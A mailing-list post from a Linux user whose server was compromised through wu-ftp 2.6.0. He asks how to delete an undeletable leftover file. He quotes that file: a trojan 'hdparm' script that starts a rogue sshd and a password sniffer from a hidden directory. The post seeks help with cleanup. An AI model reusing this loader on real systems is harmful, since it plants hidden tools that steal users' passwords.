Hello -
I was the victim of a cracker who exploited wu-ftp 2.6.0
I've since upgraded to 2.6.2, and disabled or removed almost
all of the hidden programs he left behind, but I accidently
found another one.  The problem is I cannot rm it.

I use Linux 2.2.16 and bash.

I wanted to update my hdparm file from 3.9 to 4.6 so I did
a 'locate hdparm' and found I had a copy in both /usr/bin
and /usr/sbin.  Curious, I did 'which hdparm' and found it
was the one in /usr/sbin.  So what was the other one?
It turned out to be a perl script to call the hacker's
sniffer.  I tried to move it.  I tried to edit it with vi.
The permissions were 500, so I tried to chmod 700.  I tried
to rm it.  Nothing.  I get this message:

   "Cannot unlink hdparm: Operation not permitted."

Can you tell me how to get rid of this offensive piece of
garbage?  BTW, this is the contents of the file:


#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /

I found that tcp.log contained plain text passwords of every user
on my system.  scarey!

        -Roy Wilson-
        [EMAIL PROTECTED]





_______________________________________________
Bug-fileutils mailing list
[EMAIL PROTECTED]
http://mail.gnu.org/mailman/listinfo/bug-fileutils

Reply via email to